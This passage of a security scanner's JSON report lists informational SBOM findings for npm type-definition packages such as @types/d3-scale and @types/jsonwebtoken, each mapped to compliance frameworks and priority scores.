"sha512-NcV1JjO5oDzoK26oMzbILE6HW7uVXOHLQvHshBUW4UMdZGfiY6v5BeQwh9a9tCzv+CeefZQHJt5SRgK154RtiA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "ac33d3528c07735d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @types/d3-interpolate 3.0.4", "title": "@types/d3-interpolate 3.0.4", "description": "Package discovered: @types/d3-interpolate 3.0.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "d2cfc65d37d7fda7", "name": "@types/d3-interpolate", "version": "3.0.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@types\\/d3-interpolate:\\@types\\/d3-interpolate:3.0.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3-interpolate:\\@types\\/d3_interpolate:3.0.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3_interpolate:\\@types\\/d3-interpolate:3.0.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3_interpolate:\\@types\\/d3_interpolate:3.0.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3-interpolate:3.0.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3_interpolate:3.0.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40types/d3-interpolate@3.0.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@types/d3-interpolate/-/d3-interpolate-3.0.4.tgz", "integrity": "sha512-mgLPETlrpVV1YRJIglr4Ez47g7Yxjl1lj7YKsiMCb27VJH9W8NVM6Bb9d8kkpG/uAQS5AmbA48q2IAolKKo1MA==", "dependencies": { "@types/d3-color": "*" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "9ef37f1ec9a73980", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @types/d3-path 3.1.1", "title": "@types/d3-path 3.1.1", "description": "Package discovered: @types/d3-path 3.1.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "0128eed2457b60d1", "name": "@types/d3-path", "version": "3.1.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@types\\/d3-path:\\@types\\/d3-path:3.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3-path:\\@types\\/d3_path:3.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3_path:\\@types\\/d3-path:3.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3_path:\\@types\\/d3_path:3.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3-path:3.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3_path:3.1.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40types/d3-path@3.1.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@types/d3-path/-/d3-path-3.1.1.tgz", "integrity": "sha512-VMZBYyQvbGmWyWVea0EHs/BwLgxc+MKi1zLDCONksozI4YJMcTt8ZEuIR4Sb1MMTE8MMW49v0IwI5+b7RmfWlg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "b363e223fe02334b", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @types/d3-scale 4.0.9", "title": "@types/d3-scale 4.0.9", "description": "Package discovered: @types/d3-scale 4.0.9", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "6f0b81bc9d69ce92", "name": "@types/d3-scale", "version": "4.0.9", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@types\\/d3-scale:\\@types\\/d3-scale:4.0.9:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3-scale:\\@types\\/d3_scale:4.0.9:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3_scale:\\@types\\/d3-scale:4.0.9:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3_scale:\\@types\\/d3_scale:4.0.9:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3-scale:4.0.9:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3_scale:4.0.9:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40types/d3-scale@4.0.9", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@types/d3-scale/-/d3-scale-4.0.9.tgz", "integrity": "sha512-dLmtwB8zkAeO/juAMfnV+sItKjlsw2lKdZVVy6LRr0cBmegxSABiLEpGVmSJJ8O08i4+sGR6qQtb6WtuwJdvVw==", "dependencies": { "@types/d3-time": "*" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "22226a3e628ac76c", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @types/d3-shape 3.1.8", "title": "@types/d3-shape 3.1.8", "description": "Package discovered: @types/d3-shape 3.1.8", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "533995aeaf2ae857", "name": "@types/d3-shape", "version": "3.1.8", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@types\\/d3-shape:\\@types\\/d3-shape:3.1.8:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3-shape:\\@types\\/d3_shape:3.1.8:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3_shape:\\@types\\/d3-shape:3.1.8:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3_shape:\\@types\\/d3_shape:3.1.8:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3-shape:3.1.8:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3_shape:3.1.8:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40types/d3-shape@3.1.8", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@types/d3-shape/-/d3-shape-3.1.8.tgz", "integrity": "sha512-lae0iWfcDeR7qt7rA88BNiqdvPS5pFVPpo5OfjElwNaT2yyekbM0C9vK+yqBqEmHr6lDkRnYNoTBYlAgJa7a4w==", "dependencies": { "@types/d3-path": "*" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "e91025b60bc33c45", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @types/d3-time 3.0.4", "title": "@types/d3-time 3.0.4", "description": "Package discovered: @types/d3-time 3.0.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "d051a01827d6eb95", "name": "@types/d3-time", "version": "3.0.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@types\\/d3-time:\\@types\\/d3-time:3.0.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3-time:\\@types\\/d3_time:3.0.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3_time:\\@types\\/d3-time:3.0.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3_time:\\@types\\/d3_time:3.0.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3-time:3.0.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3_time:3.0.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40types/d3-time@3.0.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@types/d3-time/-/d3-time-3.0.4.tgz", "integrity": "sha512-yuzZug1nkAAaBlBBikKZTgzCeA+k1uy4ZFwWANOfKw5z5LRhV0gNA7gNkKm7HoK+HRN0wX3EkxGk0fpbWhmB7g==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "83378a6b374bc40d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @types/d3-timer 3.0.2", "title": "@types/d3-timer 3.0.2", "description": "Package discovered: @types/d3-timer 3.0.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "a9187c78265f1b66", "name": "@types/d3-timer", "version": "3.0.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@types\\/d3-timer:\\@types\\/d3-timer:3.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3-timer:\\@types\\/d3_timer:3.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3_timer:\\@types\\/d3-timer:3.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3_timer:\\@types\\/d3_timer:3.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3-timer:3.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3_timer:3.0.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40types/d3-timer@3.0.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@types/d3-timer/-/d3-timer-3.0.2.tgz", "integrity": "sha512-Ps3T8E8dZDam6fUyNiMkekK3XUsaUEik+idO9/YjPtfj2qruF8tFBXS7XhtE4iIXBLxhmLjP3SXpLhVf21I9Lw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "4a3de97ef48e263d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @types/jsonwebtoken 9.0.10", "title": "@types/jsonwebtoken 9.0.10", "description": "Package discovered: @types/jsonwebtoken 9.0.10", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "bbe9092f97742247", "name": "@types/jsonwebtoken", "version": "9.0.10", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@types\\/jsonwebtoken:\\@types\\/jsonwebtoken:9.0.10:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40types/jsonwebtoken@9.0.10", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@types/jsonwebtoken/-/jsonwebtoken-9.0.10.tgz", "integrity": "sha512-asx5hIG9Qmf/1oStypjanR7iKTv0gXQ1Ov/jfrX6kS/EO0OFni8orbmGCn0672NHR3kXHwpAwR+B368ZGN/2rA==", "dependencies": { "@types/ms": "*", "@types/node": "*" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "be245f9788db1459", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @types/long 4.0.2", "title": "@types/long 4.0.2", "description": "Package discovered: @types/long 4.0.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "69a126982af5137d", "name": "@types/long", "version": "4.0.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@types\\/long:\\@types\\/long:4.0.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40types/long@4.0.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@types/long/-/long-4.0.2.tgz", "integrity": "sha512-MqTGEo5bj5t157U6fA/BiDynNkn0YknVdh48CMPkTSpFTVmvao5UQmm7uEF6xBEo7qIMAlY/JSleYaE6VOdpaA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "b5bebd78899827a5", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @types/ms 2.1.0", "title": "@types/ms 2.1.0", "description": "Package discovered: @types/ms 2.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "fa54533e742eac71", "name": "@types/ms", "version": "2.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", 